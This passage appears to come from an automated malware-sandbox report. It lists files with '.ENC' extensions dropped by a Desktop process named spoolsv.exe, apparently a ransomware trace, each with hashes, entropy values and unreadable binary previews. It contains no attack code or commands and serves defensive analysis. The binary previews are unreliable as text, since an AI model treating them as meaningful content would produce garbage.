                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.;.@*i......;a..q....>.....5.._.n..........]..#s..[.$X......4[...\A{.p.i.B=.\.E.......G..........J.Ge~#...r...y...........j.{.T.K..K......VMIy9.,v.<..o.C9..4...Y.9v...n2.Z.J...7x......+>B/$d.y...P.\u'..@hF.....^...t..]...q..$...X..l..o.U.K2.d..Z..l...v...ho..N{...9}..{hM^..d.U......._Y.%.c+"<.....{.DH{..3...?.?...Q...OB(........a.Qw.66(.......0U.........&..... w......4G[.F.. u....r.#.Q~].7.pO;1S(G..a.(..?px....{...^....}..U<.1.2.yX.y-..o...F.$.......Q.?..n.K..^...l..|.9.A.u.+'=wl.'1.8R.....a}...>.J.'}P..Z.>..\D....x.". .4.X..9...c.x..b.k.t.Q.....9H....._.E.r.O.^.M....;B..m....}.zf./.H)r.."...H.....<~uD.b$Ro..oq...-.aY..._...z.b....I.....5..0y.q.?O'.n_..c....i.......-.<..QLa..l.......I...T.....X.W..Q.L.:..)....\.i..6...g.IkB..ckG.w).H....|M....}qI.@:e>.R..\.l..K....v...r|l|~#2..\S.....x.`..#.i-...w..7.RY.[,.qC..a.>K...#...J|...C.?C..'..........Xj.}%..Wn..5...^S..*...<.3.....J.[..S.+)}I`..Z..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700251v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.878818450588074
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+UvqO5Eett8ow30EOa2tpL1T/SuLeNZUlg7U9KA5m4llV9fKE33YsKAKq4R3EJG:+3PF3qttNqwC7ZO3lngAKn3EM
                                                                                                                                                                                                                                                      MD5:432630C458B71110D06C21022A0E58C9
                                                                                                                                                                                                                                                      SHA1:3C432A71A942FB6D925D5143AA0F4252D89925AA
                                                                                                                                                                                                                                                      SHA-256:C531C93ACF10125AF4E69AA7592BD1EC196E05515533F087043A12C14F0E9723
                                                                                                                                                                                                                                                      SHA-512:9A037CE1876502D8398FE9917C935EC28B571A4FE2D2D4945867053E7530EF69FC7CD7AC46C91BE5E03385119D81B2FD9189F3911FE7322E2D0778F286391B39
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F...]..o...h{x.B...8........U.%.........T.......UC!N.Y..,.........a...f..~~...Y.D. ....h..z....E.I.....'.....:....4.gw..F.$)...X90.C...s.>o.......*[....J...zi.%.,y.............f.2..M.]..[...vN..)'.B...2.....S}..8.p..TB..&V...o.cy.+.......L.@.R.Pal.i~...:..../..7E...9......t.....8#j..t...C{....u...;.U?..E.]...=\.SkM..n3.............7.8....!.....'!8...q..._..j".w.`Lh.VY...V.f....j.....k~..|.K.O.7<LmH...X)..~`..2&.@s'.....Ur..%.1u.. ...0Y?....R..vf.*......@i6...x..E".c.6..)..N..&... t^>...te...5.c..X?.B.EJ.p........Z.kX..&..m.Q/....O.-..K.~s.g.p...i.e..q..B......k.X).'..w.k.VA..^.-n..!H...M.C.U..-.......[]."..O...o.[.[h.*.S.r.<.A...{...w....I'.<.A..........l.Ak.._.....l0B._..>.Rd.C.......[n...K..{.N!~..2.7^...jU_P..G....+.y.f..^.~.H4.~G.....e..0...w....U......(.........w.......g.v...;h.....z.i{#.........z...4H>P6...?.r..x..(......Uy/M..f...LP..Q...?SE:7..{.;...o..._.Z....8L.....k.....b.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700300v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.867944090943188
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+/I/8DNBRRo68W8UO9+nG8pBidNBrBbTQ9c2TfG1v1wE6iocgC375PbY:+g/OXRXwO/iNDbTQ99a92vC37a
                                                                                                                                                                                                                                                      MD5:03C484D03432388BD3CC94EAB1DD5454
                                                                                                                                                                                                                                                      SHA1:D4913F637D22E6236003DCA3F9FF7418CF79F2B8
                                                                                                                                                                                                                                                      SHA-256:3CF74A0D78927A0FF1456A17B7DE11DB1AB6E9ABEA43D2096D31D6CFBDDDBA37
                                                                                                                                                                                                                                                      SHA-512:40AFD4E5A1E1ACEEBE26D40963116E6F28FC6092576C2859E64687F5FFF00DEEA02B8ECFAD2D3D445336F4DE94E96BDA91E36E7FD2D5C0EE9AC181A3A91D8A6F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F....8O....81a...1.P.6.n.....p.tbs........m..B..M[..Rw.<.2.W ..........c..Q................^&...h.Hi....j.>....>..S.. ...I.......K].\.>?.....W..:.vT.........K.S.i)..E.I....V.ox.u..E.0..L...d.E..8.x+.g......"A.'....S.3...:s.....w]..@4.....x...y.XR...j.......9o))4=`..(...n.,x.i.5.....?.Q..%' .....d..~.['..z'd....y.)$.s>vr....E....Bt.q..\.........&...9...g...n.i..NPJ.>.O..Z..%....m..Nu.L.2Z.[..T..|..`...y.....K.io....l\.X...-rFzH.[GB.g...`.....>....a..._.....xZ.).gy..i...f.G.r.e..+......i......Z.1Bf.]z.H..,jf?...oDG?.......c.. j.?......gK.E..y..3%=.S....#..B~....nR..[s.`V`3E^...HL..\.G......<feo..%L.....I....v.:..4K.iLW1..2p..X.......r..........).U.....@.5.5,.....P.e"....~z..+P*.._.)..U{..N.e,:...XY..1x....V........J..8........}k.Z...1l.^.....+..Q........O5..)...S?e...A`=.L...0.a.%6..._..gk....{....-.8m#............H@..D:..k.J.w&...}b,&...3&.I...J%.5.*..H.........u..r.uB*o)+G..A..|k|[N........

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700301v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.859749010488757
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+8YqZ5XBQmRTYmujE0Wfg4p/Cgq3+d6Lp89+mrE+LnM5Sc+xvqbeNJRO5B:+8Y4amZSE3g6Cgq3cOpTwE+IAmsJEB
                                                                                                                                                                                                                                                      MD5:8561C3828900D61C9CD689E8359E4FA6
                                                                                                                                                                                                                                                      SHA1:BE5276A2F22413BAF58E686836CD0C9EE175E3CC
                                                                                                                                                                                                                                                      SHA-256:F476DD4564D417F9F4C4ABEA7D0454C305A4B0ED48E83BF3B23F9EAC1B90CC29
                                                                                                                                                                                                                                                      SHA-512:35E4483E15AB06C7FCCC6D654DE7880B10219128AD2307809D540FDFB27DBB79AECD84EC0B8323B22100586B29BE2B7602975BC31055A70E7CD8EE61BAEC486A
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.s....V.3b.+,..8]..j.A>.....x.=.46...i$tF..=?.<.. ........_. .s.@Q.y9.../.C.=3S.1.{'.i..7.....c7(.!q.Q}Gf_.....$.R...MO.$,ynG..k?-.N.u..c.KtfC...}.....z.....k._..N....F...f.tM{ c..c.I../......qC..]7F.*T.h$...m$.a)..h#.-..a=.....pD2.P.........G~...E.55...(Xi.^]h..:i.:...u.gU6.F._>.......2.r.e.=..Y......B...R1.$I4~M.hXj#.w....L.a..{.....6@......,.D.. .@.Y(..].y..8.j.......@c.:.&........y.&.......`2mV:._..&.2=i^.X..c...1..u.".+...n`^\.......*Zx.@.:L.I@bR.I..j.s......2...t.@3.......<.|..I/`.,pT."..%.u........8$`...A...0.7`....R....K.8..g./.......uF.P.D.T.............,@...r...K<...U....|......B.'.>.H...6._ .3...H..3%..C...W...hR..&.r.w.D&...t=}fxF.>..P.....:U...?.`u.e-.L...(.b..}F..K...2Yl.......V.>h:0...K..~f.|..zo......*Bi.e.g.....*.//..DeX.^:.3..[=.l...OPF..v......y.......s..)....<*..`N.6~........^8R......|w.3......eC.8..d..;);....xb......@H...b..F.Xk....9M...c.<.V..P+.s.#..R.:.U(JE.................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700350v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                                      Entropy (8bit):7.829525991576916
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+EDurmuaqcFZ89XJxk3B6LrzOTxxuScTiFBGNkGfZwT7D4qc24SPunop:+EumucFZiI6rzhYFAI7cHZSm2
                                                                                                                                                                                                                                                      MD5:87C8505E890EE4F6FE9E7B42A51EF5A3
                                                                                                                                                                                                                                                      SHA1:51B14BAE24DEA6080102E5A41997C1F8D0A23B44
                                                                                                                                                                                                                                                      SHA-256:66D58E0747BF49F711D14EB0159F4B2FD6068028163A0882DE5EEA936D7A6745
                                                                                                                                                                                                                                                      SHA-512:37E96BDF6E9E0610C31223FCE4500ADC13B064E1BEC3221B2CD4E6E053D16B3D39F9068C8218D99D167A20B4904D0E3E2D32497E2A4250608D20E9600BFB7C3C
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.}}.f..oyWq........%...C..C].sD.Pb.P.^}.p.>...-V...R.....%..7.Q..77};..Eu.. ..e.a..1.....L.....Mf.y^r....s.KX..../.O......g0....P....Pm.J.<vsQ.... .q.sY.T.z........>..:C].US."$.....u..X9.r.\9.I.d@w....DS..I..*"........s..9.../.C...9..HG0p..x}tT....t!..*{.....0.qg....hl.....a...Dm....t.2p.;..H.p..no.d..E96...N.........H..s.S...a:.u{...W..*.v...w...W..<........U.2..u.E...r.....g.C....1....:.h........J..a@.....6.....^.V.=.>..).W....[".... .....E.H].....u.p2.@..............!...]............q8..n..{.w...4f\.Oo.Wn%b.-._..Q.O..(...2.\!;X...&\..A.....[QYYv.4D5...........RA..?.g{~..z.E..@s...$.......Cp.w.{l>...N.u.V.>.f.O...f..N.&.sI..V...\R...g.a..}....66..X....^...l"......F.m..".....s.M..SN....+K2..I.R_..-......WF......1f...;.6.q..T.........PTm.9....!.n.._<M....p2.......t..Q.T..L..u.....\m+...sq.)..d&.o...J........A.I..\..e.I..%..s{(.~.M....#.Xx.*.^...._'n.2..z..p.Q..S&N..i..v.K..{.@i.....[@.....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700351v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.862690288574438
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+g1riLZY/y0iEP8CcgTf0imgcRmdzUDfDNjTTbk5Y80dghtU8d1CDyufv5aGnJD:+gs1Y/3iK8Xmd2jH+d0QtUK11aB9nl
                                                                                                                                                                                                                                                      MD5:999ACC9319016328A10DB48AB381D825
                                                                                                                                                                                                                                                      SHA1:57CAA7E342571A9F6196AB7A2A27A38677AA7D56
                                                                                                                                                                                                                                                      SHA-256:4402046CC58C8AE739368127EC9E867F8065758E998B8D4E79619C4625ADCBEF
                                                                                                                                                                                                                                                      SHA-512:B0F0E624B3E58119130260F45A97F2B0FDA3AA4A19C709E6A2374004043A51FA1FDF6B408CCE0AAF28CCA1EF81967A59676CEFE1CF4CED6EB023FA6B3C0489BC
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F._..5...T.xT..b.O#C.tVR..... ..l.,...Z...+h..f|_........S(........=|.:.A.....%o[wkC=/.l..v.t.i.M.c...E#.k..k..l..Y..\y.BE<D.sd.p=..z1........u)...i...0wK.M...vF/.X...j.Z...=..~T.fS.$........%c.B3..E....@v.d.../!..x..G.tr.%....HZ..69.5S.uC5..U.{.~V..E.d.B....=........"...[....^O2....H$f>f.....J....vJ.....7\.N..4>..i.......x...QE.........o..o..M..#..?E.R..........}.L...vxT....1YK..T.:.(......58I..8.~d.......I.3.n)eMKf8..'....z...DW7.k..n(e/.7.....TW."..Z0.N.....9...I>j#....c....E;(.......oB..i{8.....G..m.X..;..%2.Q.y...b...E....U0.8...J...*#.#h.D.J...."....=...I.....*<.3......6.PI.N.q.Fc..9_.@..7rt._.@.4.].B...R.~...4..m...0F.. .e......N..R.P...._. .....,...(\<..VHj...`. .1,J...j....r.{...7....RL..7..`.C.U.......J.$....|...4._e....Jw'.yj.bm.<`.H.t..2.Xk:G..~...*w.w.P/..t.T"0..^.....uj.*.......N;^RX..1..m.'.#O.Y.1.q0.....>..O.X..9....$;..I.Y......l.g.......e12 .....X......a...`P'.5....g...F.l..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700400v2.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.869640576534667
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+tRshzpYk5kivTGyya6L8yXEMA8YSmUr+Ee9wlsi0PZfnOKkiLPI1WHjZRDLRA:+tIzpY+yayn8Sdp+nOKkMIEHN9FA
                                                                                                                                                                                                                                                      MD5:81109F3ECEEAB4591A17C3E8E81AFBFB
                                                                                                                                                                                                                                                      SHA1:C44FE6B4C9628CACFEF9E46BE1B84A902AFFD8AD
                                                                                                                                                                                                                                                      SHA-256:64EE13A12A64BD141295FA141E528D86856CC811A600C9C8ACAEA732B0452095
                                                                                                                                                                                                                                                      SHA-512:1EFEA3CD0BD757B024DF6BDE531459166C39036ED3C1770355297933250123C06E19188927D25C6F5B01F21C20BBA621958C82CBBC458BF1AAA422B9446B8C48
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F..q...e.yH,}tY.t._.D.@.!X>.Q........xkI..IR,.A.,..7....Lt.c8.c.....O=...]W.......U.H.WG..C.,....q....\j./..n$..Pz.P4.k."=.\yNE..9...=o..n.<.g.0...YAe..Y..'...ZF...f...>.)>yYm..Si.rp...b.#A\..A.*t......v..w.-.]*.`...g..l..T0....G....*~2H..E..ca..Z.Z....y.z..E...|.Q.K1...X...|5.k=.!.w..b...g.e.....n.........S..h.{.3K."sV..-..W...GQ.g........Q...*f&...\z...A...<.4 .rN...s.(.2\..-...x.....x?<#.0.{.....n.XW{;.X.w4.......9.....K..@1.]..v.Z.c.&.^.L{.M.m2.[.....@..........moYK"S8..g.%.Q.]u..e.t..A.09...|..#.Q.R......2.v.b.b^uW...dN.&.y6S....nB...L\!....a4S{.@.>...v....#.-. ...,C.1.O..h..Y.6..,.<.*..0.K.>q..v.,'.....`.u.x..W7......nN..t!R.c....z..u.P.w...3.:.2..r.......oGB..1.l......VyF..<5......?..)EX.e...T......."r|}.Il.x....}{....wF0.m........h....d./..$....(....G.".Jr..\N.,.>E.8eS-q%..j|....D...6.#.....8....D{7...s..j.......z5......'........jFL1.8G..R.J~...Y.4...(.ik...7.4.......M.m/...$.5u..Xr.h...x..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700401v2.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.853900526934738
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+5uPpGwZfiplcTrEBhpvWnvAfZj1TRzV+rmAlOwJDX+RNewXsoFg5yNSrDzcPKE1:+4P3GjIvABj1RzM6AEwEVXsoik9ioVBf
                                                                                                                                                                                                                                                      MD5:87B01688ACABA25137153F1CE41B8BFD
                                                                                                                                                                                                                                                      SHA1:CA3197FDD729F78F02B5045E2E3693F622A598F7
                                                                                                                                                                                                                                                      SHA-256:1D34F57F1FD535D9805D77668705AA41941ED11A9F9C12BCC14D022ED89F4AA2
                                                                                                                                                                                                                                                      SHA-512:11DB46189F412850C899D4622C8F0D7FA6329AE6A9273AF47C0321C68DBD9217343158B51000D28464E3BB3DF9334CD0DE2E93A935C50383E8407F290315C5DC
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.piQ..W...yn.|.fF....xr..|.Icm.s(.~0.^U.2.5w.P%A.....Y.1......"`...Y'..."}m}..(?..n..........H...odk..v...<..........K.:q.. .7.WC........._..../@.<..2..h.L#M..h..y.B.....-.(.s.K.p..<..vo..^..<7K.!6...FL|`..W-..*.q.\...Dd..$.~1oY>.Ls..Go..{".Y-.A.{u.k.....D.k...Dg.Du.u0...r2.....Lh....J..f......6...+.dGz..]E..iZ..2.j`%.|..V.TI./.W..(7..M.R..r.^..%$o....^.l#...t....GI.._..G.....i..!y.z.k(.Af.w..j.../......)E...........w.vgt...k.\...a.H,.... ...3..Z{,Y...k.<D....].L.B.n.}..Z..Z....s.xZ.........y.....K.+...".....2.z.$.....V.XGf..;).DM.<......$.Uu.YO9.UY..m.u.8..5.C..byWX....._..I{......>.E....M..::Q.{r.#.....uj...Bq.y.J\N.:.....#.p.../h...{Wm-......g./.y.j.n.B._9..1.yL..~...W^......s...p..%m....k.i`.A.b!..|....y....~..,..K|..`)8|..VA.......y..T...p.Q.a.$[.NA[..Y.vQ...~.[C.w.!..~Y..%.U}|5.."l..(........#.1...:..-.k......~.[.B...5...j.....|J..Y.F..U1~.Q..'["1.+.3i?C.~....*k.:......v..(...9@..h..j.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700450v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                                      Entropy (8bit):7.866873270596414
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+m5dq6bdby501vSvjz0z2+6cAW+i2Z33bsfkEyf2QcMu0yO1pq4KqbMGlm:+mXq6bdbaKvSvjgy+6fWk9ul02JePqh3
                                                                                                                                                                                                                                                      MD5:4B9C30BF20CFA0DD90E554D4316609FA
                                                                                                                                                                                                                                                      SHA1:DD0A988C6750E4685E228B850621698A453E18C2
                                                                                                                                                                                                                                                      SHA-256:E8727859504CB03F272ABB79F91C102BB721FE60E3A94142695500BABC7839FB
                                                                                                                                                                                                                                                      SHA-512:13D1ABBEF747CBFB3EC683C47675C0157DA2222D91E12D44EF06F77E29C1F209C2168661CE5041B786682B7152DD524D22F91BA625858F8EEDC8450E1C7F6E98
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.CX..#./...M.T7.n.V.b./...N.(.C.{./..*I..j...D..U.k_->5..t..aE.=..V..H..he.R...F....~[..../.....$.\.....w. ......A...Tm....s.CJp..a.."0....S.v..&.].....K...../.;....N3SY...T$..A}H...v..F)....O.^..&$B......J..%.U.a....4.9.]..8.si..gGE..|.*..Y.o(F..........n[{.....YF.F.....B...b.}(...w6i.....,.cv`Q.>jp.]..../2...=.......ec.-.O....s.......:@.Y`.@.V^...yPn?.%..*.@...a....>;lN...a..T`....4O..H..b....X'.P\$...*...b...@...P.9.7...c...n...G...,..s.=Vo.k.......Rv5.%........4=.V...32..PI..P]....`N.L.=.F|... ........z..j9..<X.+.[Z.PU....tJ1.(..P.`I.m..(.26..R..cq.G.P1...)NB'.._).&^..#F..^.!A..}...f.....+.M..9....:.bU..G...Y}...U..e...#.l.AR........r...[..R........0_....3N..I..X.n...K..L....U7.1k..W..}..-...)q..b...lH....H..,..K........]xO..7BBh.|.@..C.g......B#....X5..\X._.0].. T&.....m........b...^.....]...,/kxK..p.xY.nG...J...q:.....Mg....2.3...FuS...6C6>.M...J..-.e.<.k..+.K...J.......7.u.#$.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700451v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.870931532883856
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+dYuat3F6IaAF0NSI6KhdQqHkQ/jwSEMf3nJY5JbPgJ0km00KmYHEkHRCD:+yuat1b06KhGCgwWvkmDFYkk4
                                                                                                                                                                                                                                                      MD5:23ED95A52EF29540BB55B6B58C9ACD64
                                                                                                                                                                                                                                                      SHA1:0FC60B7736C325749DD583177B04238E4BE18C21
                                                                                                                                                                                                                                                      SHA-256:64733304B8215802A08690BE4CF0DF8A21BE070A8FAFB3F736C127379F55856E
                                                                                                                                                                                                                                                      SHA-512:6675BE33A163D68B244534DFD6D2AA2CEF5BD487A542F5FF67A1A043221571C1330F9B44C2636BDA5C02C79B480D6B24C78BA39F8A561D4FBEB9FA247FBCD661
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.m....[.w.T....h.L,....N.l..'zo...;G....b.....O ...T...'._..U....y..oN..................g..h.6|(....)..${.4...1.I...^..5._%...'=.......$.GpL..b.&R4V9B..B..zOp...Nj+....*...'..\...B...T.....@G....9..Ka..v.:...#...U.y!...l..js}q.>#.t..J....n....gJ....wz.6.....M....X`.k.Rw....G.S..C....H74U..Fy.c.+VF`.OU.CH.f.6.b.N.AD.K..0G.}c%....pRH.eS.O.};..)1.IbxjkIe?0..&..6...A.JW..sU....f%"..J..A..."..T..}n3f.?..".g}...].3.&....3-..t..a.....P2P.D..X..AJ..'.....@`.9~..J4.....;..0_...J.e&...b..)09.!Z..].Zd.w.!C..s;....Y..U7*.....o...]........Uk0.zm.].....=Z......P...F..[.X..... .X...0'8...hB..@..........<.....s...$..h+>bn..0t.Nd.<...P.o.]K.W,.k....m.g7.{...K....=#.. ...W.z..v.H......$d..B........S..[..q.;.yO.........m..n.H..f..q@`.........iT...&1JF6![(.>6..q8Gs..Cx.Ro.^$..!.g.9..^..MOE..f...8w1......~9.....$...#1..H.*.:.R.s...6...|.^f..YU.Pn....2e...iY+....A.s1l. .T.s..8...._.7...Y.#!..D..YW.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700500v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.85098118789428
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+MZx6SaPwhA4eIRGfNhEQoi1iAKe+XEBQ1/vDoJi1tG2zRXDkgAaj:+ZP4gsAlKe+p1/vDoJ+tGcpfj
                                                                                                                                                                                                                                                      MD5:44760A1C060DCBF421F7927316CEBFCD
                                                                                                                                                                                                                                                      SHA1:74A036404E551D572F077DA777CD65CAE4220E08
                                                                                                                                                                                                                                                      SHA-256:CBA065BC1F4550BDC701F40B5A826767F19251CE4ECE21504469A4A36AD20015
                                                                                                                                                                                                                                                      SHA-512:E34C20FE2521D71E74487A649600BFBC452F6C8B3491E2EC6BBC55B622766CF10C6E4E93D61B354E455F1BDA143CB218FDC01F49363545EC5FD371A4E59EF1DB
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.^...J...W..9t..b...|.C........+2...Q....Rnzf.?....;..c.^...?....<...#..~W......`....7......(J.3tn.z]..(.8..}\..Dxd:.;.Y..v.I....A2.w..cc.G0....u./.`m.Z...-+.....:T.4-.u....c.........@.@.0...P.V.y.B.S..l.H $.Z\..kY4.U.C..R..(P......1..[`... ..i0f..%.'.........R....D..A.J....R.L.b.?..h.0........otZ.m.k......V.......GN\..m|.wk......1e.....{Y.S.gG..9.1........s.Ap*G.Kq...t|.|]...B..+-{q[..B..}.+.....!B.$?..8..h.q.@.l..T......x.*.3..x4.q.......KW.n}5}..Tk.<7...*0...:X..d..&..,.......V..o..M..3Nw....U.T.#.D.t.v..6.(._)..S.. ...h.H...../[..k....<..l|...Jt....).I.Z....5.".u.hQ..o...f.u...:..j8..!Ct.v.-..c...~.#......9.I.-.`....#&....P4..]=.c..N.....W...#......L>.Gv.i..v.w.R..$.wT.M.V.y....(..S.TH.R..5K.L...e..9%.....*.k.s.3[.>.f.......2I..t.....c.K.Z...L....W..4U.l.._..*J..w..f.p9._..R.F.*...U.....#W.]>92..T.......-..,...}..U..+..S.Sj..=.}*.?.h.K..l.-..<.......... . .A.[.-..8<..U[K29..)>....-...{?L...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700501v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.861477767840591
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+xMMwBV9eSjRhp+cMzYjExxzvkNN+8FnRO45eVZZ1jSMmlchn:+jwBrRhp+YKhvkflOz7vjUKn
                                                                                                                                                                                                                                                      MD5:DDA2A88CB359EED02AB43E2CF2E631F9
                                                                                                                                                                                                                                                      SHA1:8CE1D81914F2DFC9D0CF92038F650E08A577874F
                                                                                                                                                                                                                                                      SHA-256:35F9ABC1EF109042BB302B468231F61CD13739725D2BD73E7BBBED357C230760
                                                                                                                                                                                                                                                      SHA-512:E916C99230A8041FB1F92E093651F478500A7D8D6888B03E6588733BA8FEA822A598479B2B70094A592DC6E7E9CAFF914178CCAFF033CBF567A7BF8F1F4B901B
                                                                                                                                                                                                                                                      Malicious:false
